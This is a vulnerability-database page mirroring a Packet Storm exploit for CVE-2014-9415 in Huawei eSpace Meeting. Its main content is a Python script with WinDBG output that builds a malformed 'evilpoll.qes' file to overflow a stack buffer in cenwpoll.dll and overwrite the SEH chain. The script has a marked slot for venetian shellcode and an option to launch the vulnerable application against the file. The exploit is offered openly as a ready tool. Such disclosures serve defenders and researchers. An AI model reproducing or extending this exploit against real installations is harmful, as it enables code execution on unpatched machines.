Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLiquidWormPACKETSTORM:152965
HistoryMay 17, 2019 - 12:00 a.m.

Huawei eSpace 1.1.11.103 Unicode Stack Buffer Overflow

2019-05-1700:00:00
LiquidWorm
packetstormsecurity.com
208

0.0004 Low

EPSS

Percentile

16.0%

JSON
`#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
#  
# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite  
#  
#  
# Vendor: Huawei Technologies Co., Ltd.  
# Product web page: https://www.huawei.com  
# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)  
# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290  
# Affected module: cenwpoll.dll 1.0.8.8  
# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe  
#  
# Product description:  
# --------------------  
# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of  
# products. Huawei’s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides  
# users with easy and secure access to their service platform from any device, in any place, at any time.  
# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using  
# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed.  
#  
# Vulnerability description:  
# --------------------------  
# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails  
# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when  
# handling QES files. Attackers can exploit this issue to execute arbitrary code within the context of  
# the affected application. Failed exploit attempts will likely result in denial-of-service conditions.  
#  
# Tested on:  
# ----------  
# OS Name: Microsoft Windows 7 Professional  
# OS Version: 6.1.7601 Service Pack 1 Build 7601  
# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz  
#  
# Vulnerability discovered by:  
# ----------------------------  
# Gjoko 'LiquidWorm' Krstic  
# Senior STTE  
# SCD-ERC  
# Munich, Germany  
# 26th of August (Tuesday), 2014  
#  
# PSIRT details:  
# --------------  
# Security advisory No.: Huawei-SA-20141217- espace  
# Initial release date: Dec 17, 2014  
# Vulnerability ID: HWPSIRT-2014-1151  
# CVE ID: CVE-2014-9415  
# Patched version: eSpace Meeting V100R001C03  
# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589  
#   
#  
# ------------------------------------ WinDBG output ------------------------------------  
#  
# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance)  
# First chance exceptions are reported before any exception handling.  
# This exception may be expected and handled.  
# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045  
# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc  
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246  
# *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll  
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\cenwpoll.dll -   
# cenwpoll!DllUnregisterServer+0xa59e:  
# 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=????????  
# 0:008> !exchain  
# 02feccf4: *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe  
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\eSpace-ecs\conf\cwbin\mcstub.exe  
# mcstub+10041 (00410041)  
# Invalid exception stack at 00410041  
# Instruction Address: 0x0000000005790f3e  
#   
# Description: Exception Handler Chain Corrupted  
# Short Description: ExceptionHandlerCorrupted  
# Exploitability Classification: EXPLOITABLE  
# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b)  
#  
# Corruption of the exception handler chain is considered exploitable  
#  
# 0:008> d ebp  
# 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
# 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
# 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
# 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
# 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
# 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
# 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
# 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.  
# 0:008> u ebp  
# 02fecd00 41 inc ecx  
# 02fecd01 004100 add byte ptr [ecx],al  
# 02fecd04 41 inc ecx  
# 02fecd05 004100 add byte ptr [ecx],al  
# 02fecd08 41 inc ecx  
# 02fecd09 004100 add byte ptr [ecx],al  
# 02fecd0c 41 inc ecx  
# 02fecd0d 004100 add byte ptr [ecx],al  
#  
# ------------------------------------ /WinDBG output ------------------------------------  
#  
#  
  
import sys, os, time  
  
os.system('title jterm')  
os.system('color f5')  
os.system('cls')  
piton = os.path.basename(sys.argv[0])  
  
def usage():  
print '''  
+---------------------------------------------+  
| eSpace Meeting Stack Buffer Overflow Vuln |  
| |  
| Vuln ID: HWPSIRT-2014-1151 |  
| CVE ID: CVE-2014-9415 |  
+---------------------------------------------+  
'''  
if len(sys.argv) < 2:  
print 'Usage: \n\n\t'+piton+' <OPTION>'  
print '\nOPTION:\n'  
print '\t0 - Create the evil PoC file.'  
print '\t1 - Create the evil file, start the vulnerable application and crash it.'  
print '\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\n'  
quit()  
  
usage()  
crash = sys.argv[1]  
  
dir = os.getcwd();  
file = "evilpoll.qes"  
header = '\x56\x34\x78\x12\x01\x00\x09\x00' # V4x.....  
  
time.sleep(1)  
# Overwrite FS:[0] chain (\x43 = EIP)  
buffer = '\x41' * 353 +'\x42' * 2 +'\x43' * 2 +'\x44' * 42 +'New Poll' # \x44 can be incremented (byte space for venetian shellcode)  
buffer += '\x00\x01\x00\x00\x00\x00\x00\x90'  
buffer += '\x85\xA9\xD7\x00\x01\x04\x00'  
buffer += 'TEST'+'\x01\x02\x05\x00'  
buffer += 'ANSW1'+'\x05\x00'  
buffer += 'ANSW2'  
  
poc = header + buffer  
bytes = len(poc)  
  
print '[+] Creating evil PoC file...'  
time.sleep(1)  
print '[+] Buffering:\n'  
time.sleep(1)  
  
index = 0  
while index < len(poc):  
char = poc[index]  
#print char,  
sys.stdout.write(char)  
time.sleep(10.0 / 1000.0)  
index = index + 1  
  
try:  
writeFile = open (file, 'w')  
writeFile.write( poc )  
writeFile.close()  
time.sleep(1)  
print '\n\n[+] File \"'+file+'\" successfully created!'  
time.sleep(1)  
print '[+] Location: "'+dir+'"'  
print '[+] Wrote '+str(bytes)+' bytes.'  
except:  
print '[-] Error while creating file!\n'  
  
if crash == '0':  
print '\n\n[+] Done!\n'  
elif crash == '1':  
print '[+] The script will now execute the vulnerable application with the PoC file as its argument.\n'  
os.system('pause')  
os.system('C:\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe "%~dp0evilpoll.qes"')  
elif crash == '2':  
print '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\n'  
os.system('pause')  
os.system('C:\\Progra~1\\Debugg~1\\windbg.exe -Q -g -c "!exchain" -o "C:\\Progra~1\eSpace-ecs\conf\cwbin\classreader.exe" "%~dp0evilpoll.qes"')  
print '\n[+] You should see something like this in WinDBG:'  
print '''  
0:000> d 0012e37c  
0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.  
0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0012e3bc 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.  
0012e3cc 44 00 44 00 44 00 44 00-44 00 44 00 4e 00 65 00 D.D.D.D.D.D.N.e.  
0012e3dc 77 00 20 00 50 00 6f 00-6c 00 6c 00 00 00 00 00 w. .P.o.l.l.....  
0012e3ec c2 01 00 00 56 34 78 12-70 09 87 02 00 00 00 00 ....V4x.p.......  
0:000> !exchain  
0012e37c: 00430043  
Invalid exception stack at 00420042  
'''  
else:  
print '[+] Have a nice day! ^^\n'  
quit()  
  
print '\n[+] Have a nice day! ^^\n'  
#os.system('color 07')  
`

Related

exploitpack 1
cvelist 1
prion 1
zdt 1
cve 1
nvd 1
exploitdb 1
huawei 1
exploitpack
exploitpack
Huawei eSpace Meeting 1.1.11.103 - cenwpoll.dll SEH Buffer Overflow (Unicode)
2019-05-20 00:00:00
cvelist
cvelist
CVE-2014-9415
2014-12-24 18:00:00
prion
prion
Design/Logic Flaw
2014-12-24 18:59:00
zdt
zdt
Huawei eSpace Meeting 1.1.11.103 - (cenwpoll.dll) SEH Buffer Overflow (Unicode) Exploit
2019-05-18 00:00:00
cve
cve
CVE-2014-9415
2014-12-24 18:59:12
nvd
nvd
CVE-2014-9415
2014-12-24 18:59:12
exploitdb
exploitdb
Huawei eSpace Meeting 1.1.11.103 - &#039;cenwpoll.dll&#039; SEH Buffer Overflow (Unicode)
2019-05-20 00:00:00
huawei
huawei
Security Advisory-Multiple Vulnerabilities in Huawei eSpace Desktop Product
2014-12-17 00:00:00

0.0004 Low

EPSS

Percentile

16.0%

JSON
Related for PACKETSTORM:152965
exploitpack1cvelist1prion1zdt1cve1nvd1exploitdb1huawei1